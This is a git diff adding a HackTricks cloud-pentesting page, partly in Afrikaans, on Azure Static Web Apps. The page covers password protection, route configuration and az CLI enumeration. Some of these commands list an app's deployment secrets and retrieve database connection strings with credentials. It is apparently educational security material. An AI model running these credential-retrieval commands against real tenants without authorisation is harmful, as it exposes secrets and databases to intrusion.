 $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
 ```
diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
new file mode 100644
index 000000000..b4edbedfe
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -0,0 +1,109 @@
+# Az - Statiese Web Apps
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Statiese Web Apps Basiese Inligting
+
+Azure Static Web Apps is 'n wolkdienste vir die aanbied van **statiese web apps met outomatiese CI/CD vanaf repositories soos GitHub**. Dit bied globale inhoudsaflewering, serverless agtergronde, en ingeboude HTTPS, wat dit veilig en skaalbaar maak. egter, risiko's sluit verkeerd geconfigureerde CORS, onvoldoende verifikasie, en inhoudsmanipulasie in, wat apps aan aanvalle soos XSS en datalekke kan blootstel as dit nie behoorlik bestuur word nie.
+
+> [!TIP]
+> Wanneer 'n Statiese App geskep word, kan jy die **ontplooiing outorisering beleid** tussen **Ontplooiingstoken** en **GitHub Actions werksvloei** kies.
+
+
+### Web App Verifikasie
+
+Dit is moontlik om 'n **wagwoord te konfigureer** om toegang tot die Web App te verkry. Die webkonsol laat jou toe om dit te konfigureer om slegs staging omgewings of beide staging en die produksie omgewing te beskerm.
+
+So lyk 'n wagwoord beskermde web app op die tyd van skryf:
+
+<figure><img src="../../../images/azure_static_password.png" alt=""><figcaption></figcaption></figure>
+
+
+Dit is moontlik om te sien **of enige wagwoord gebruik word** en watter omgewings beskerm word met:
+```bash
+az rest --method GET \
+--url "/subscriptions/<subscription-id>/resourceGroups/Resource_Group_1/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2024-04-01"
+```
+However, this **won't show the password in clear text**, just something like: `"password": "**********************"`.
+
+### Routes
+
+Routes definieer **hoe inkomende HTTP versoeke hanteer word** binne 'n statiese webtoepassing. Geconfigureer in die **`staticwebapp.config.json`** lêer, beheer hulle URL herskrywing, herleidings, toegangbeperkings, en rolgebaseerde outorisering, wat behoorlike hulpbronhantering en sekuriteit verseker.
+
+Some example:
+```json
+{
+"routes": [
+{
+"route": "/",
+"rewrite": "/index.html"
+},
+{
+"route": "/about",
+"rewrite": "/about.html"
+},
+{
+"route": "/api/*",
+"allowedRoles": ["authenticated"]
+},
+{
+"route": "/admin",
+"redirect": "/login",
+"statusCode": 302
+}
+],
+"navigationFallback": {
+"rewrite": "/index.html",
+"exclude": ["/api/*", "/assets/*"]
+}
+}
+```
+## Opname
+```bash
+# List Static Webapps
+az staticwebapp list --output table
+
+# Get Static Webapp details
+az staticwebapp show --name <name> --resource-group <res-group> --output table
+
+# Get appsettings
+az staticwebapp appsettings list --name <name>
+
+# Get env information
+az staticwebapp environment list --name <name>
+az staticwebapp environment functions --name <name>
+
+# Get API key
+az staticwebapp secrets list --name <name>
+
+# Get invited users
+az staticwebapp users list --name <name>
+
+# Get database connections
+az rest --method GET \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections?api-version=2021-03-01"
+
+## Once you have the database connection name ("default" by default) you can get the connection string with the credentials
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections/default/show?api-version=2021-03-01"
+```
+## Voorbeelde om Web Apps te genereer
+
+Jy kan 'n mooi voorbeeld vind om 'n web app te genereer in die volgende skakel: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github)
+
+1. Fork die repository https://github.com/staticwebdev/react-basic/generate na jou GitHub-rekening en noem dit `my-first-static-web-app`
+2. Skep 'n Static Web App in die Azure-portaal deur die Github-toegang te konfigureer en die voorheen geforkte nuwe repository te kies
+3. Skep dit, en wag 'n paar minute, en kyk na jou nuwe bladsy!
+
+## Post Exploitation
+
+{{#ref}}
+../az-privilege-escalation/az-static-web-apps-post-exploitation.md
+{{#endref}}
+
+## Verwysings
+
+- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
+- [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
+
+{{#include ../../../banners/hacktricks-training.md}}